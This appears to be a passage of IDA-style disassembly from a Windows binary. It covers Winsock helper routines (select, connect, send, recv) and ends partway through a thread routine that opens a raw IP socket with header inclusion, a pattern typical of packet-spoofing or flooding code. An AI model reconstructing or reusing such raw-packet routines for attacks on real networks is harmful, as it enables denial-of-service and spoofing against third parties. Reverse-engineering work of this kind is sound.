; sub_4143B0+3A�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_0], 200h
jbe short loc_404D21
xor eax, eax
jmp short locret_404D4B
; ---------------------------------------------------------------------------
loc_404D21: ; CODE XREF: sub_404D10+B�j
push 1010h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_404D39
xor eax, eax
jmp short locret_404D4B
; ---------------------------------------------------------------------------
loc_404D39: ; CODE XREF: sub_404D10+23�j
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov [eax], ecx
mov eax, [ebp+var_4]
and dword ptr [eax+4], 0
mov eax, [ebp+var_4]
locret_404D4B: ; CODE XREF: sub_404D10+F�j
; sub_404D10+27�j
leave
retn
sub_404D10 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404D4D proc near ; CODE XREF: sub_41349C+417�p
; sub_4143B0+109�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_4]
mov eax, [eax+4]
cmp eax, [ecx]
jnz short loc_404D6A
push [ebp+arg_0]
call sub_4053B1
pop ecx
xor eax, eax
jmp short loc_404D99
; ---------------------------------------------------------------------------
loc_404D6A: ; CODE XREF: sub_404D4D+E�j
mov eax, [ebp+arg_4]
mov eax, [eax+4]
mov ecx, [ebp+arg_4]
mov edx, [ebp+arg_0]
mov [ecx+eax*4+0Ch], edx
mov eax, [ebp+arg_4]
mov eax, [eax+4]
inc eax
mov ecx, [ebp+arg_4]
mov [ecx+4], eax
mov eax, [ebp+arg_4]
mov ecx, [ebp+arg_4]
mov eax, [eax+4]
xor edx, edx
cmp eax, [ecx]
setnz dl
mov eax, edx
loc_404D99: ; CODE XREF: sub_404D4D+1B�j
pop ebp
retn
sub_404D4D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404D9B proc near ; CODE XREF: sub_41349C+512�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_404DAC
; ---------------------------------------------------------------------------
loc_404DA5: ; CODE XREF: sub_404D9B:loc_404E18�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_404DAC: ; CODE XREF: sub_404D9B+8�j
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
cmp ecx, [eax+4]
jnb short locret_404E1A
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
mov eax, [ecx+eax*4+0Ch]
cmp eax, [ebp+arg_0]
jnz short loc_404E18
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
cmp ecx, [eax+8]
jb short loc_404DDE
mov eax, [ebp+arg_4]
mov eax, [eax+8]
dec eax
mov ecx, [ebp+arg_4]
mov [ecx+8], eax
loc_404DDE: ; CODE XREF: sub_404D9B+34�j
mov eax, [ebp+arg_4]
mov eax, [eax+4]
sub eax, [ebp+var_4]
shl eax, 2
push eax
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
lea eax, [ecx+eax*4+10h]
push eax
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
lea eax, [ecx+eax*4+0Ch]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+arg_4]
mov eax, [eax+4]
dec eax
mov ecx, [ebp+arg_4]
mov [ecx+4], eax
jmp short locret_404E1A
; ---------------------------------------------------------------------------
loc_404E18: ; CODE XREF: sub_404D9B+29�j
jmp short loc_404DA5
; ---------------------------------------------------------------------------
locret_404E1A: ; CODE XREF: sub_404D9B+1A�j
; sub_404D9B+7B�j
leave
retn
sub_404D9B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404E1C proc near ; CODE XREF: sub_41349C+45F�p
; sub_4143B0+14E�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push esi
mov eax, [ebp+arg_0]
and dword ptr [eax+8], 0
mov eax, [ebp+arg_0]
and dword ptr [eax+80Ch], 0
and [ebp+var_8], 0
jmp short loc_404E41
; ---------------------------------------------------------------------------
loc_404E3A: ; CODE XREF: sub_404E1C+BD�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_404E41: ; CODE XREF: sub_404E1C+1C�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8]
cmp ecx, [eax+4]
jnb loc_404EDE
loc_404E50: ; CODE XREF: sub_404E1C+B7�j
and [ebp+var_14], 0
jmp short loc_404E5D
; ---------------------------------------------------------------------------
loc_404E56: ; CODE XREF: sub_404E1C:loc_404E86�j
mov eax, [ebp+var_14]
inc eax
mov [ebp+var_14], eax
loc_404E5D: ; CODE XREF: sub_404E1C+38�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_14]
cmp ecx, [eax+80Ch]
jnb short loc_404E88
mov eax, [ebp+var_14]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
mov esi, [ebp+arg_0]
mov eax, [ecx+eax*4+810h]
cmp eax, [esi+edx*4+0Ch]
jnz short loc_404E86
jmp short loc_404E88
; ---------------------------------------------------------------------------
loc_404E86: ; CODE XREF: sub_404E1C+66�j
jmp short loc_404E56
; ---------------------------------------------------------------------------
loc_404E88: ; CODE XREF: sub_404E1C+4D�j
; sub_404E1C+68�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_14]
cmp ecx, [eax+80Ch]
jnz short loc_404ECF
mov eax, [ebp+arg_0]
cmp dword ptr [eax+80Ch], 200h
jnb short loc_404ECF
mov eax, [ebp+var_14]
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
mov esi, [ebp+arg_0]
mov edx, [esi+edx*4+0Ch]
mov [ecx+eax*4+810h], edx
mov eax, [ebp+arg_0]
mov eax, [eax+80Ch]
inc eax
mov ecx, [ebp+arg_0]
mov [ecx+80Ch], eax
loc_404ECF: ; CODE XREF: sub_404E1C+78�j
; sub_404E1C+87�j
xor eax, eax
test eax, eax
jnz loc_404E50
jmp loc_404E3A
; ---------------------------------------------------------------------------
loc_404EDE: ; CODE XREF: sub_404E1C+2E�j
and [ebp+var_10], 0
mov [ebp+var_C], 3E8h
lea eax, [ebp+var_10]
push eax
push 0
mov eax, [ebp+arg_0]
add eax, 80Ch
push eax
push 0
push 0
call ds:dword_41722C ; select
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_404F1A
cmp [ebp+var_4], 0FFFFFFFFh
jz short loc_404F1A
mov [ebp+var_18], 1
jmp short loc_404F1E
; ---------------------------------------------------------------------------
loc_404F1A: ; CODE XREF: sub_404E1C+ED�j
; sub_404E1C+F3�j
and [ebp+var_18], 0
loc_404F1E: ; CODE XREF: sub_404E1C+FC�j
mov eax, [ebp+var_18]
pop esi
leave
retn
sub_404E1C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404F24 proc near ; CODE XREF: sub_41349C+470�p
; sub_4143B0+16D�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
mov eax, [eax+8]
mov [ebp+var_4], eax
jmp short loc_404F3A
; ---------------------------------------------------------------------------
loc_404F33: ; CODE XREF: sub_404F24:loc_404F77�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_404F3A: ; CODE XREF: sub_404F24+D�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_4]
cmp ecx, [eax+4]
jnb short loc_404F79
mov eax, [ebp+arg_0]
add eax, 80Ch
push eax
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4+0Ch]
call sub_416E30 ; __WSAFDIsSet
test eax, eax
jz short loc_404F77
mov eax, [ebp+var_4]
inc eax
mov ecx, [ebp+arg_0]
mov [ecx+8], eax
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov eax, [ecx+eax*4+0Ch]
jmp short locret_404F7B
; ---------------------------------------------------------------------------
loc_404F77: ; CODE XREF: sub_404F24+3B�j
jmp short loc_404F33
; ---------------------------------------------------------------------------
loc_404F79: ; CODE XREF: sub_404F24+1F�j
xor eax, eax
locret_404F7B: ; CODE XREF: sub_404F24+51�j
leave
retn
sub_404F24 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404F7D proc near ; CODE XREF: sub_404FD0+6�p
; sub_41349C+59C�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_404F8E
; ---------------------------------------------------------------------------
loc_404F87: ; CODE XREF: sub_404F7D+37�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_404F8E: ; CODE XREF: sub_404F7D+8�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_4]
cmp ecx, [eax+4]
jnb short loc_404FB6
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4+0Ch]
call sub_4053B1
pop ecx
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
and dword ptr [ecx+eax*4+0Ch], 0
jmp short loc_404F87
; ---------------------------------------------------------------------------
loc_404FB6: ; CODE XREF: sub_404F7D+1A�j
mov eax, [ebp+arg_0]
and dword ptr [eax+4], 0
mov eax, [ebp+arg_0]
and dword ptr [eax+8], 0
mov eax, [ebp+arg_0]
and dword ptr [eax+80Ch], 0
leave
retn
sub_404F7D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404FD0 proc near ; CODE XREF: sub_41349C+5FB�p
; sub_4143B0+238�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call sub_404F7D
pop ecx
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
pop ebp
retn
sub_404FD0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404FE7 proc near ; CODE XREF: sub_412BC9+11�p
; sub_41349C+40E�p ...
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 2Ch
push 20h
push 0
lea eax, [ebp+var_24]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+arg_8]
and eax, 2
test eax, eax
jz short loc_405010
mov [ebp+var_20], 17h
jmp short loc_405027
; ---------------------------------------------------------------------------
loc_405010: ; CODE XREF: sub_404FE7+1E�j
mov eax, [ebp+arg_8]
and eax, 1
test eax, eax
jz short loc_405023
mov [ebp+var_20], 2
jmp short loc_405027
; ---------------------------------------------------------------------------
loc_405023: ; CODE XREF: sub_404FE7+31�j
and [ebp+var_20], 0
loc_405027: ; CODE XREF: sub_404FE7+27�j
; sub_404FE7+3A�j
mov eax, [ebp+arg_8]
and eax, 4
xor ecx, ecx
test eax, eax
setnz cl
inc ecx
mov [ebp+var_1C], ecx
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_24]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_41DF54 ; getaddrinfo
test eax, eax
jz short loc_405057
xor eax, eax
jmp locret_4050E8
; ---------------------------------------------------------------------------
loc_405057: ; CODE XREF: sub_404FE7+67�j
mov eax, [ebp+var_28]
mov [ebp+var_4], eax
jmp short loc_405068
; ---------------------------------------------------------------------------
loc_40505F: ; CODE XREF: sub_404FE7+A8�j
; sub_404FE7+F4�j
mov eax, [ebp+var_4]
mov eax, [eax+1Ch]
mov [ebp+var_4], eax
loc_405068: ; CODE XREF: sub_404FE7+76�j
cmp [ebp+var_4], 0
jz short loc_4050DD
mov eax, [ebp+var_4]
push dword ptr [eax+0Ch]
mov eax, [ebp+var_4]
push dword ptr [eax+8]
mov eax, [ebp+var_4]
push dword ptr [eax+4]
call ds:dword_417218 ; socket
mov [ebp+var_2C], eax
cmp [ebp+var_2C], 0FFFFFFFFh
jnz short loc_405091
jmp short loc_40505F
; ---------------------------------------------------------------------------
loc_405091: ; CODE XREF: sub_404FE7+A6�j
push 0
push [ebp+var_2C]
call sub_404457
pop ecx
pop ecx
mov eax, [ebp+var_4]
push dword ptr [eax+10h]
mov eax, [ebp+var_4]
push dword ptr [eax+18h]
push [ebp+var_2C]
call ds:dword_4171F4 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_4050D2
call ds:dword_417224 ; WSAGetLastError
cmp eax, 2733h
jnz short loc_4050D2
push [ebp+var_28]
call ds:dword_41DF5C ; freeaddrinfo
mov eax, [ebp+var_2C]
jmp short locret_4050E8
; ---------------------------------------------------------------------------
loc_4050D2: ; CODE XREF: sub_404FE7+CE�j
; sub_404FE7+DB�j
push [ebp+var_2C]
call sub_4053B1
pop ecx
jmp short loc_40505F
; ---------------------------------------------------------------------------
loc_4050DD: ; CODE XREF: sub_404FE7+85�j
push [ebp+var_28]
call ds:dword_41DF5C ; freeaddrinfo
xor eax, eax
locret_4050E8: ; CODE XREF: sub_404FE7+6B�j
; sub_404FE7+E9�j
leave
retn
sub_404FE7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4050EA proc near ; CODE XREF: sub_401E38+80�p
; sub_402698+16�p ...
var_844 = dword ptr -844h
var_840 = dword ptr -840h
var_83C = dword ptr -83Ch
var_838 = dword ptr -838h
var_834 = dword ptr -834h
var_830 = dword ptr -830h
var_82C = dword ptr -82Ch
var_828 = dword ptr -828h
var_824 = dword ptr -824h
var_820 = dword ptr -820h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 844h
mov eax, [ebp+arg_C]
cdq
mov ecx, 3E8h
idiv ecx
mov [ebp+var_834], eax
mov eax, [ebp+arg_C]
cdq
mov ecx, 3E8h
idiv ecx
imul edx, 3E8h
mov [ebp+var_830], edx
push 20h
push 0
lea eax, [ebp+var_24]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+arg_8]
and eax, 2
test eax, eax
jz short loc_40513E
mov [ebp+var_20], 17h
jmp short loc_405155
; ---------------------------------------------------------------------------
loc_40513E: ; CODE XREF: sub_4050EA+49�j
mov eax, [ebp+arg_8]
and eax, 1
test eax, eax
jz short loc_405151
mov [ebp+var_20], 2
jmp short loc_405155
; ---------------------------------------------------------------------------
loc_405151: ; CODE XREF: sub_4050EA+5C�j
and [ebp+var_20], 0
loc_405155: ; CODE XREF: sub_4050EA+52�j
; sub_4050EA+65�j
mov eax, [ebp+arg_8]
and eax, 4
xor ecx, ecx
test eax, eax
setnz cl
inc ecx
mov [ebp+var_1C], ecx
lea eax, [ebp+var_82C]
push eax
lea eax, [ebp+var_24]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_41DF54 ; getaddrinfo
test eax, eax
jz short loc_405188
xor eax, eax
jmp locret_40538B
; ---------------------------------------------------------------------------
loc_405188: ; CODE XREF: sub_4050EA+95�j
mov eax, [ebp+var_82C]
mov [ebp+var_4], eax
jmp short loc_40519C
; ---------------------------------------------------------------------------
loc_405193: ; CODE XREF: sub_4050EA+E3�j
; sub_4050EA+128�j ...
mov eax, [ebp+var_4]
mov eax, [eax+1Ch]
mov [ebp+var_4], eax
loc_40519C: ; CODE XREF: sub_4050EA+A7�j
cmp [ebp+var_4], 0
jz loc_40537D
mov eax, [ebp+var_4]
push dword ptr [eax+0Ch]
mov eax, [ebp+var_4]
push dword ptr [eax+8]
mov eax, [ebp+var_4]
push dword ptr [eax+4]
call ds:dword_417218 ; socket
mov [ebp+var_83C], eax
cmp [ebp+var_83C], 0FFFFFFFFh
jnz short loc_4051CF
jmp short loc_405193
; ---------------------------------------------------------------------------
loc_4051CF: ; CODE XREF: sub_4050EA+E1�j
push 0
push [ebp+var_83C]
call sub_404457
pop ecx
pop ecx
mov eax, [ebp+var_4]
push dword ptr [eax+10h]
mov eax, [ebp+var_4]
push dword ptr [eax+18h]
push [ebp+var_83C]
call ds:dword_4171F4 ; connect
mov [ebp+var_838], eax
cmp [ebp+var_838], 0
jz short loc_405217
call ds:dword_417224 ; WSAGetLastError
cmp eax, 2733h
jz short loc_405217
jmp loc_405193
; ---------------------------------------------------------------------------
loc_405217: ; CODE XREF: sub_4050EA+119�j
; sub_4050EA+126�j
and [ebp+var_828], 0
loc_40521E: ; CODE XREF: sub_4050EA+1AF�j
and [ebp+var_840], 0
jmp short loc_405234
; ---------------------------------------------------------------------------
loc_405227: ; CODE XREF: sub_4050EA:loc_405259�j
mov eax, [ebp+var_840]
inc eax
mov [ebp+var_840], eax
loc_405234: ; CODE XREF: sub_4050EA+13B�j
mov eax, [ebp+var_840]
cmp eax, [ebp+var_828]
jnb short loc_40525B
mov eax, [ebp+var_840]
mov eax, [ebp+eax*4+var_824]
cmp eax, [ebp+var_83C]
jnz short loc_405259
jmp short loc_40525B
; ---------------------------------------------------------------------------
loc_405259: ; CODE XREF: sub_4050EA+16B�j
jmp short loc_405227
; ---------------------------------------------------------------------------
loc_40525B: ; CODE XREF: sub_4050EA+156�j
; sub_4050EA+16D�j
mov eax, [ebp+var_840]
cmp eax, [ebp+var_828]
jnz short loc_405295
cmp [ebp+var_828], 200h
jnb short loc_405295
mov eax, [ebp+var_840]
mov ecx, [ebp+var_83C]
mov [ebp+eax*4+var_824], ecx
mov eax, [ebp+var_828]
inc eax
mov [ebp+var_828], eax
loc_405295: ; CODE XREF: sub_4050EA+17D�j
; sub_4050EA+189�j
xor eax, eax
test eax, eax
jnz short loc_40521E
lea eax, [ebp+var_834]
push eax
push 0
lea eax, [ebp+var_828]
push eax
push 0
push 0
call ds:dword_41722C ; select
cmp eax, 1
jnz short loc_4052E0
push 1
push [ebp+var_83C]
call sub_404457
pop ecx
pop ecx
push [ebp+var_82C]
call ds:dword_41DF5C ; freeaddrinfo
mov eax, [ebp+var_83C]
jmp locret_40538B
; ---------------------------------------------------------------------------
loc_4052E0: ; CODE XREF: sub_4050EA+1CE�j
; sub_4050EA+27C�j
and [ebp+var_844], 0
jmp short loc_4052F6
; ---------------------------------------------------------------------------
loc_4052E9: ; CODE XREF: sub_4050EA:loc_405360�j
mov eax, [ebp+var_844]
inc eax
mov [ebp+var_844], eax
loc_4052F6: ; CODE XREF: sub_4050EA+1FD�j
mov eax, [ebp+var_844]
cmp eax, [ebp+var_828]
jnb short loc_405362
mov eax, [ebp+var_844]
mov eax, [ebp+eax*4+var_824]
cmp eax, [ebp+var_83C]
jnz short loc_405360
loc_405319: ; CODE XREF: sub_4050EA+265�j
mov eax, [ebp+var_828]
dec eax
cmp [ebp+var_844], eax
jnb short loc_405351
mov eax, [ebp+var_844]
mov ecx, [ebp+var_844]
mov ecx, [ebp+ecx*4+var_820]
mov [ebp+eax*4+var_824], ecx
mov eax, [ebp+var_844]
inc eax
mov [ebp+var_844], eax
jmp short loc_405319
; ---------------------------------------------------------------------------
loc_405351: ; CODE XREF: sub_4050EA+23C�j
mov eax, [ebp+var_828]
dec eax
mov [ebp+var_828], eax
jmp short loc_405362
; ---------------------------------------------------------------------------
loc_405360: ; CODE XREF: sub_4050EA+22D�j
jmp short loc_4052E9
; ---------------------------------------------------------------------------
loc_405362: ; CODE XREF: sub_4050EA+218�j
; sub_4050EA+274�j
xor eax, eax
test eax, eax
jnz loc_4052E0
push [ebp+var_83C]
call sub_4053B1
pop ecx
jmp loc_405193
; ---------------------------------------------------------------------------
loc_40537D: ; CODE XREF: sub_4050EA+B6�j
push [ebp+var_82C]
call ds:dword_41DF5C ; freeaddrinfo
xor eax, eax
locret_40538B: ; CODE XREF: sub_4050EA+99�j
; sub_4050EA+1F1�j
leave
retn
sub_4050EA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40538D proc near ; CODE XREF: sub_401E38+26E�p
; sub_4020C2+3FB�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 1
push [ebp+arg_0]
call ds:dword_417200 ; shutdown
push 3E8h
call ds:dword_41709C ; Sleep
push [ebp+arg_0]
call sub_4053B1
pop ecx
pop ebp
retn
sub_40538D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4053B1 proc near ; CODE XREF: sub_404279+77�p
; sub_40432E+1C�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call ds:dword_417230 ; closesocket
pop ebp
retn
sub_4053B1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4053BF proc near ; CODE XREF: sub_401E38+15C�p
; sub_4020C2+2F9�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push 0
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_41720C ; send
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
leave
retn
sub_4053BF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4053DC proc near ; CODE XREF: sub_403DF3+D1�p
; sub_405443+21�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_8], 2
jnb short loc_4053F6
push 271Eh
call ds:dword_417234 ; WSASetLastError
or eax, 0FFFFFFFFh
jmp short locret_405441
; ---------------------------------------------------------------------------
loc_4053F6: ; CODE XREF: sub_4053DC+8�j
push 0
mov eax, [ebp+arg_8]
dec eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_417248 ; recv
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_405418
cmp [ebp+var_4], 0FFFFFFFFh
jnz short loc_40541D
loc_405418: ; CODE XREF: sub_4053DC+34�j
mov eax, [ebp+var_4]
jmp short locret_405441
; ---------------------------------------------------------------------------
loc_40541D: ; CODE XREF: sub_4053DC+3A�j
mov eax, [ebp+var_4]
cmp eax, [ebp+arg_8]
jb short loc_405435
push 271Eh
call ds:dword_417234 ; WSASetLastError
or eax, 0FFFFFFFFh
jmp short locret_405441
; ---------------------------------------------------------------------------
loc_405435: ; CODE XREF: sub_4053DC+47�j
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
and byte ptr [eax], 0
mov eax, [ebp+var_4]
locret_405441: ; CODE XREF: sub_4053DC+18�j
; sub_4053DC+3F�j ...
leave
retn
sub_4053DC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405443 proc near ; CODE XREF: sub_402698+8D�p
; sub_402698+2BE�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push [ebp+arg_C]
push [ebp+arg_0]
call sub_40546E
pop ecx
pop ecx
test eax, eax
jnz short loc_40545B
xor eax, eax
jmp short loc_40546C
; ---------------------------------------------------------------------------
loc_40545B: ; CODE XREF: sub_405443+12�j
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4053DC
add esp, 0Ch
loc_40546C: ; CODE XREF: sub_405443+16�j
pop ebp
retn
sub_405443 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40546E proc near ; CODE XREF: sub_405443+9�p
; sub_410649+2D�p ...
var_1018 = dword ptr -1018h
var_1014 = dword ptr -1014h
var_1010 = dword ptr -1010h
var_100C = dword ptr -100Ch
var_1008 = dword ptr -1008h
var_1004 = dword ptr -1004h
var_804 = dword ptr -804h
var_800 = dword ptr -800h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1018h
call sub_416BC0
and [ebp+var_804], 0
and [ebp+var_1008], 0
loc_405489: ; CODE XREF: sub_40546E+90�j
and [ebp+var_1014], 0
jmp short loc_40549F
; ---------------------------------------------------------------------------
loc_405492: ; CODE XREF: sub_40546E:loc_4054C1�j
mov eax, [ebp+var_1014]
inc eax
mov [ebp+var_1014], eax
loc_40549F: ; CODE XREF: sub_40546E+22�j
mov eax, [ebp+var_1014]
cmp eax, [ebp+var_804]
jnb short loc_4054C3
mov eax, [ebp+var_1014]
mov eax, [ebp+eax*4+var_800]
cmp eax, [ebp+arg_0]
jnz short loc_4054C1
jmp short loc_4054C3
; ---------------------------------------------------------------------------
loc_4054C1: ; CODE XREF: sub_40546E+4F�j
jmp short loc_405492
; ---------------------------------------------------------------------------
loc_4054C3: ; CODE XREF: sub_40546E+3D�j
; sub_40546E+51�j
mov eax, [ebp+var_1014]
cmp eax, [ebp+var_804]
jnz short loc_4054FA
cmp [ebp+var_804], 200h
jnb short loc_4054FA
mov eax, [ebp+var_1014]
mov ecx, [ebp+arg_0]
mov [ebp+eax*4+var_800], ecx
mov eax, [ebp+var_804]
inc eax
mov [ebp+var_804], eax
loc_4054FA: ; CODE XREF: sub_40546E+61�j
; sub_40546E+6D�j
xor eax, eax
test eax, eax
jnz short loc_405489
loc_405500: ; CODE XREF: sub_40546E+107�j
and [ebp+var_1018], 0
jmp short loc_405516
; ---------------------------------------------------------------------------
loc_405509: ; CODE XREF: sub_40546E:loc_405538�j
mov eax, [ebp+var_1018]
inc eax
mov [ebp+var_1018], eax
loc_405516: ; CODE XREF: sub_40546E+99�j
mov eax, [ebp+var_1018]
cmp eax, [ebp+var_1008]
jnb short loc_40553A
mov eax, [ebp+var_1018]
mov eax, [ebp+eax*4+var_1004]
cmp eax, [ebp+arg_0]
jnz short loc_405538
jmp short loc_40553A
; ---------------------------------------------------------------------------
loc_405538: ; CODE XREF: sub_40546E+C6�j
jmp short loc_405509
; ---------------------------------------------------------------------------
loc_40553A: ; CODE XREF: sub_40546E+B4�j
; sub_40546E+C8�j
mov eax, [ebp+var_1018]
cmp eax, [ebp+var_1008]
jnz short loc_405571
cmp [ebp+var_1008], 200h
jnb short loc_405571
mov eax, [ebp+var_1018]
mov ecx, [ebp+arg_0]
mov [ebp+eax*4+var_1004], ecx
mov eax, [ebp+var_1008]
inc eax
mov [ebp+var_1008], eax
loc_405571: ; CODE XREF: sub_40546E+D8�j
; sub_40546E+E4�j
xor eax, eax
test eax, eax
jnz short loc_405500
mov eax, [ebp+arg_4]
xor edx, edx
mov ecx, 3E8h
div ecx
mov [ebp+var_1010], eax
mov eax, [ebp+arg_4]
xor edx, edx
mov ecx, 3E8h
div ecx
imul edx, 3E8h
mov [ebp+var_100C], edx
lea eax, [ebp+var_1010]
push eax
lea eax, [ebp+var_1008]
push eax
push 0
lea eax, [ebp+var_804]
push eax
push 1
call ds:dword_41722C ; select
cmp eax, 1
jz short loc_4055C9
xor eax, eax
jmp short locret_4055E3
; ---------------------------------------------------------------------------
loc_4055C9: ; CODE XREF: sub_40546E+155�j
lea eax, [ebp+var_804]
push eax
push [ebp+arg_0]
call sub_416E30 ; __WSAFDIsSet
test eax, eax
jz short loc_4055E1
push 1
pop eax
jmp short locret_4055E3
; ---------------------------------------------------------------------------
loc_4055E1: ; CODE XREF: sub_40546E+16C�j
xor eax, eax
locret_4055E3: ; CODE XREF: sub_40546E+159�j
; sub_40546E+171�j
leave
retn
sub_40546E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4055E5 proc near ; DATA XREF: sub_405E45+113�o
var_1358 = dword ptr -1358h
var_1354 = dword ptr -1354h
var_1350 = dword ptr -1350h
var_134C = dword ptr -134Ch
var_1348 = dword ptr -1348h
var_1344 = dword ptr -1344h
var_1340 = dword ptr -1340h
var_133C = dword ptr -133Ch
var_1338 = dword ptr -1338h
var_1334 = dword ptr -1334h
var_118D = byte ptr -118Dh
var_108D = byte ptr -108Dh
var_1087 = dword ptr -1087h
var_1083 = dword ptr -1083h
var_107F = dword ptr -107Fh
var_1078 = dword ptr -1078h
var_1074 = byte ptr -1074h
var_1058 = byte ptr -1058h
var_14 = dword ptr -14h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1358h
call sub_416BC0
push 2B9h
push [ebp+arg_0]
lea eax, [ebp+var_1334]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
push 0FFh
push 3
push 2
call ds:dword_417218 ; socket
mov [ebp+var_1078], eax
cmp [ebp+var_1078], 0FFFFFFFFh
jnz short loc_405643
push [ebp+var_1334]
call sub_409763
pop ecx
xor eax, eax
jmp locret_405E41
; ---------------------------------------------------------------------------
loc_405643: ; CODE XREF: sub_4055E5+49�j
mov [ebp+var_1340], 1
push 4
lea eax, [ebp+var_1340]
push eax
push 2
push 0
push [ebp+var_1078]
call ds:dword_417204 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_40567E
push [ebp+var_1334]
call sub_409763
pop ecx
xor eax, eax
jmp locret_405E41
; ---------------------------------------------------------------------------
loc_40567E: ; CODE XREF: sub_4055E5+84�j
push 0
push [ebp+var_1078]
call sub_404457
pop ecx
pop ecx
push 10h
push 0
lea eax, [ebp+var_10]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_10], 2
